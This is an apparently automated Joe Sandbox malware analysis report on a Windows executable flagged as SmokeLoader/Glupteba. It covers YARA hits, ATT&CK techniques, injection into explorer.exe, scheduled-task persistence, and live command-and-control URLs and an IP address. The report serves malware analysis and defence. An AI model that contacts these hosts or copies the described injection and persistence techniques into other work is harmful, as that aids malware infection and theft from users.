    Source: Yara matchFile source: 00000002.00000002.3447329337.0000000008751000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.2269686012.0000000002BC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000002.00000002.3444065573.0000000002F21000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY

    Remote Access Functionality

    barindex
    Yara detected SmokeLoader
    Source: Yara matchFile source: 00000006.00000002.2485910630.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000006.00000002.2485978515.0000000002CB1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.2269955686.0000000002CD1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000002.00000002.3447329337.0000000008751000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.2269686012.0000000002BC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000002.00000002.3444065573.0000000002F21000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Exploitation for Client Execution    		1
    DLL Side-Loading    		32
    Process Injection    		11
    Masquerading    		OS Credential Dumping511
    Security Software Discovery    		Remote Services1
    Archive Collected Data    		1
    Encrypted Channel    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
    DLL Side-Loading    		12
    Virtualization/Sandbox Evasion    		LSASS Memory12
    Virtualization/Sandbox Evasion    		Remote Desktop ProtocolData from Removable Media2
    Ingress Tool Transfer    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)32
    Process Injection    		Security Account Manager3
    Process Discovery    		SMB/Windows Admin SharesData from Network Shared Drive3
    Non-Application Layer Protocol    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Hidden Files and Directories    		NTDS1
    Application Window Discovery    		Distributed Component Object ModelInput Capture113
    Application Layer Protocol    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
    Obfuscated Files or Information    		LSA Secrets1
    Account Discovery    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
    Software Packing    		Cached Domain Credentials1
    System Owner/User Discovery    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
    DLL Side-Loading    		DCSync12
    System Information Discovery    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
    File Deletion    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1496331 Sample: vwaoMjcyAw.exe Startdate: 21/08/2024 Architecture: WINDOWS Score: 100 21 selebration17io.io 2->21 23 56.126.166.20.in-addr.arpa 2->23 27 Multi AV Scanner detection for domain / URL 2->27 29 Suricata IDS alerts for network traffic 2->29 31 Found malware configuration 2->31 33 7 other signatures 2->33 7 vwaoMjcyAw.exe 2->7         started        10 ifvwgru 2->10         started        signatures3 process4 signatures5 35 Detected unpacking (changes PE section rights) 7->35 37 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 7->37 39 Maps a DLL or memory area into another process 7->39 47 3 other signatures 7->47 12 explorer.exe 36 3 7->12 injected 41 Multi AV Scanner detection for dropped file 10->41 43 Machine Learning detection for dropped file 10->43 45 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 10->45 process6 dnsIp7 25 selebration17io.io 188.40.141.211, 49717, 80 HETZNER-ASDE Germany 12->25 17 C:\Users\user\AppData\Roaming\ifvwgru, PE32 12->17 dropped 19 C:\Users\user\...\ifvwgru:Zone.Identifier, ASCII 12->19 dropped 49 System process connects to network (likely due to code injection or exploit) 12->49 51 Benign windows process drops PE files 12->51 53 Deletes itself after installation 12->53 55 Hides that the sample has been downloaded from the Internet (zone.identifier) 12->55 file8 signatures9

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    vwaoMjcyAw.exe74%ReversingLabsWin32.Trojan.Glupteba
    vwaoMjcyAw.exe77%VirustotalBrowse
    vwaoMjcyAw.exe100%Joe Sandbox ML

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Roaming\ifvwgru100%Joe Sandbox ML
    C:\Users\user\AppData\Roaming\ifvwgru74%ReversingLabsWin32.Trojan.Glupteba
    C:\Users\user\AppData\Roaming\ifvwgru77%VirustotalBrowse

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    selebration17io.io17%VirustotalBrowse
    56.126.166.20.in-addr.arpa1%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    https://api.msn.com/v1/news/Feed/Windows?0%URL Reputationsafe
    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%URL Reputationsafe
    https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%URL Reputationsafe
    https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
    https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg0%URL Reputationsafe
    https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
    http://schemas.micro0%URL Reputationsafe
    http://valarioulinity1.net/index.php100%Avira URL Cloudmalware
    https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
    https://api.msn.com/I0%Avira URL Cloudsafe
    https://android.notify.windows.com/iOS0%URL Reputationsafe
    https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF0%Avira URL Cloudsafe
    https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp0%URL Reputationsafe
    https://api.msn.com/0%URL Reputationsafe
    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark0%URL Reputationsafe
    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz0%Avira URL Cloudsafe
    http://aeuothcasbr.com/0%Avira URL Cloudsafe
    https://excel.office.com-0%Avira URL Cloudsafe
    https://word.office.comM0%Avira URL Cloudsafe
    http://selebration17io.io/100%Avira URL Cloudphishing
    http://vacantion18ffeu.cc/index.php100%Avira URL Cloudmalware
    https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&oc0%Avira URL Cloudsafe
    http://atahmsiplorwquuw.net/0%Avira URL Cloudsafe
    https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-0%Avira URL Cloudsafe
    http://vacantion18ffeu.cc/index.php21%VirustotalBrowse
    https://api.msn.com/I0%VirustotalBrowse
    https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-0%Avira URL Cloudsafe
    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark0%Avira URL Cloudsafe
    http://selebration17io.io/17%VirustotalBrowse
    https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri0%Avira URL Cloudsafe
    http://valarioulinity1.net/index.php15%VirustotalBrowse
    https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA0%Avira URL Cloudsafe
    https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c0%Avira URL Cloudsafe
    https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve0%Avira URL Cloudsafe
    http://goodfooggooftool.net/index.php100%Avira URL Cloudmalware
    https://powerpoint.office.comEMd0%Avira URL Cloudsafe
    http://aeuothcasbr.com/application/x-www-form-urlencodedMozilla/5.00%Avira URL Cloudsafe
    http://cassiosssionunu.me/index.php100%Avira URL Cloudmalware
    https://outlook.come0%Avira URL Cloudsafe
    https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation0%Avira URL Cloudsafe
    https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the0%Avira URL Cloudsafe
    http://selebration17io.io/index.php100%Avira URL Cloudmalware
    https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-h0%Avira URL Cloudsafe
    http://selebration17io.io/index.php15%VirustotalBrowse
    https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu0%Avira URL Cloudsafe
    https://wns.windows.com/e0%Avira URL Cloudsafe
    https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-0%Avira URL Cloudsafe
    https://www.msn.com:443/en-us/feed0%Avira URL Cloudsafe
    http://sulugilioiu19.net/index.php100%Avira URL Cloudmalware
    https://www.msn.com:443/en-us/feed1%VirustotalBrowse
    https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-0%Avira URL Cloudsafe
    https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-ei0%Avira URL Cloudsafe
    http://goodfooggooftool.net/index.php16%VirustotalBrowse
    http://buriatiarutuhuob.net/index.php100%Avira URL Cloudmalware
    http://buriatiarutuhuob.net/index.php16%VirustotalBrowse
    http://sulugilioiu19.net/index.php14%VirustotalBrowse
    http://cassiosssionunu.me/index.php14%VirustotalBrowse

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    selebration17io.io
    		188.40.141.211
    		truetrueunknown
    56.126.166.20.in-addr.arpa
    		unknown
    		unknowntrueunknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://valarioulinity1.net/index.phptrue
    • 15%, Virustotal, Browse
    • Avira URL Cloud: malware
    		unknown
    http://vacantion18ffeu.cc/index.phptrue
    • 21%, Virustotal, Browse
    • Avira URL Cloud: malware
    		unknown
    http://goodfooggooftool.net/index.phptrue
    • 16%, Virustotal, Browse
    • Avira URL Cloud: malware
    		unknown
    http://cassiosssionunu.me/index.phptrue
    • 14%, Virustotal, Browse
    • Avira URL Cloud: malware
    		unknown
    http://selebration17io.io/index.phptrue
    • 15%, Virustotal, Browse
    • Avira URL Cloud: malware
    		unknown
    http://sulugilioiu19.net/index.phptrue
    • 14%, Virustotal, Browse
    • Avira URL Cloud: malware
    		unknown
    http://buriatiarutuhuob.net/index.phptrue
    • 16%, Virustotal, Browse
    • Avira URL Cloud: malware
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 00000002.00000000.2254640839.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3447903568.000000000962B000.00000004.00000001.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    https://api.msn.com/Iexplorer.exe, 00000002.00000000.2254640839.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3447903568.000000000962B000.00000004.00000001.00020000.00000000.sdmpfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngFexplorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    http://aeuothcasbr.com/explorer.exe, 00000002.00000002.3452125149.000000000C385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979437025.000000000C385000.00000004.00000001.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3447903568.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2254640839.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhzexplorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://excel.office.com-explorer.exe, 00000002.00000003.2979925369.000000000C08A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3451553162.000000000C08B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2256911237.000000000C048000.00000004.00000001.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://word.office.comMexplorer.exe, 00000002.00000003.2979925369.000000000C08A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3451553162.000000000C08B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2256911237.000000000C048000.00000004.00000001.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://selebration17io.io/explorer.exe, 00000002.00000002.3452125149.000000000C385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979437025.000000000C385000.00000004.00000001.00020000.00000000.sdmptrue
    • 17%, Virustotal, Browse
    • Avira URL Cloud: phishing
    		unknown
    https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&ocexplorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svgexplorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    http://atahmsiplorwquuw.net/explorer.exe, 00000002.00000002.3448807647.00000000099AB000.00000004.00000001.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://schemas.microexplorer.exe, 00000002.00000000.2251732709.00000000028A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.3446354300.0000000007B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.3446333236.0000000007B50000.00000002.00000001.00040000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-darkexplorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameriexplorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AAexplorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-cexplorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reveexplorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://powerpoint.office.comEMdexplorer.exe, 00000002.00000000.2256911237.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3451360110.000000000BFEF000.00000004.00000001.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    http://aeuothcasbr.com/application/x-www-form-urlencodedMozilla/5.0explorer.exe, 00000002.00000002.3452125149.000000000C385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979437025.000000000C385000.00000004.00000001.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://android.notify.windows.com/iOSexplorer.exe, 00000002.00000002.3451360110.000000000BFDF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2256911237.000000000BFDF000.00000004.00000001.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    https://outlook.comeexplorer.exe, 00000002.00000003.2979925369.000000000C08A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3451553162.000000000C08B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2256911237.000000000C048000.00000004.00000001.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nationexplorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 00000002.00000000.2255032281.00000000099AB000.00000004.00000001.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://api.msn.com/explorer.exe, 00000002.00000000.2254640839.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3447903568.000000000962B000.00000004.00000001.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-hexplorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-quexplorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://wns.windows.com/eexplorer.exe, 00000002.00000002.3448807647.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2255032281.00000000099AB000.00000004.00000001.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-darkexplorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    https://www.msn.com:443/en-us/feedexplorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
    • 1%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-eiexplorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown

    World Map of Contacted IPs

    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs

    Public IPs

    IPDomainCountryFlagASNASN NameMalicious
    188.40.141.211
    		selebration17io.ioGermany
    		24940HETZNER-ASDEtrue

    General Information

    Joe Sandbox version:40.0.0 Tourmaline
    Analysis ID:1496331
    Start date and time:2024-08-21 07:11:10 +02:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 5m 3s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Number of analysed new started processes analysed:7
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:1
    Technologies:
    • HCA enabled
    • EGA enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Sample name:vwaoMjcyAw.exe
    renamed because original name is a hash value
    Original Sample Name:49b527dacc10e6d0e9d2924ecc4e59a8d727d5a2eb89aea324d303f4c8e7ba28.exe
    Detection:MAL
    Classification:mal100.troj.evad.winEXE@2/2@2/1
    EGA Information:
    • Successful, ratio: 100%
    HCA Information:
    • Successful, ratio: 100%
    • Number of executed functions: 64
    • Number of non-executed functions: 7
    Cookbook Comments:
    • Found application associated with file extension: .exe

    Warnings

    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
    • Report size getting too big, too many NtEnumerateKey calls found.
    • Report size getting too big, too many NtOpenKeyEx calls found.
    • Report size getting too big, too many NtQueryValueKey calls found.

    Simulations

    Behavior and APIs

    TimeTypeDescription
    01:12:25API Interceptor616x Sleep call for process: explorer.exe modified
    07:12:31Task SchedulerRun new task: Firefox Default Browser Agent E9356D34AD307885 path: C:\Users\user\AppData\Roaming\ifvwgru

    Joe Sandbox View / Context

    IPs

    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    188.40.141.211Qi4Mj8hG3t.exeGet hashmaliciousSmokeLoaderBrowse
    • selebration17io.io/index.php
    br0A8E2X6I.exeGet hashmaliciousSmokeLoaderBrowse
    • selebration17io.io/index.php
    setup.exeGet hashmaliciousBabuk, DjvuBrowse
    • zexeq.com/test2/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4&first=true
    SecuriteInfo.com.Win32.Evo-gen.21074.1738.exeGet hashmaliciousSmokeLoaderBrowse
    • agressivemnaiq.xyz/
    A9BCD8D127BE95C64EDAE5CDD2379494A37D458FD9D5881D74F8D5487A805E6C.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
    • host-data-coin-11.com/
    be1c79275d836696a00b258d15a8b337a8c9beb8198a5bd3d5aaf64d660c8005_dump.exeGet hashmaliciousSmokeLoaderBrowse
    • host-data-coin-11.com/
    EF2D1DE8BE7B216F6983BD43D120B512A0917EBE887F30D256ECA8395CE613CC.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
    • host-data-coin-11.com/
    LisectAVT_2403002B_303.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
    • aucmoney.com/upload/
    LisectAVT_2403002C_47.exeGet hashmaliciousSmokeLoaderBrowse
    • trad-einmyus.com/index.php
    EF48AEBC0F1E77208BBCD5206C58678BB1181994507D1084E1D324DCA9D5D3B8.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
    • host-data-coin-11.com/

    Domains

    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    selebration17io.ioQi4Mj8hG3t.exeGet hashmaliciousSmokeLoaderBrowse
    • 188.40.141.211
    br0A8E2X6I.exeGet hashmaliciousSmokeLoaderBrowse
    • 188.40.141.211
    987123[1].exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
    • 188.40.141.211
    Vjt694rffx.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoaderBrowse
    • 91.215.85.120
    ak55ZgXKwt.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, SmokeLoader, Socks5SystemzBrowse
    • 91.215.85.120
    tZksysDKeT.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, SmokeLoader, Socks5SystemzBrowse
    • 91.215.85.120
    woM8Z8CFYx.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Mars Stealer, SmokeLoader, Socks5Systemz, StealcBrowse
    • 91.215.85.120
    6t0abj5L0W.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, SmokeLoader, Socks5SystemzBrowse
    • 91.215.85.120
    UUVupNLfBb.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, SmokeLoader, Socks5SystemzBrowse
    • 91.215.85.120
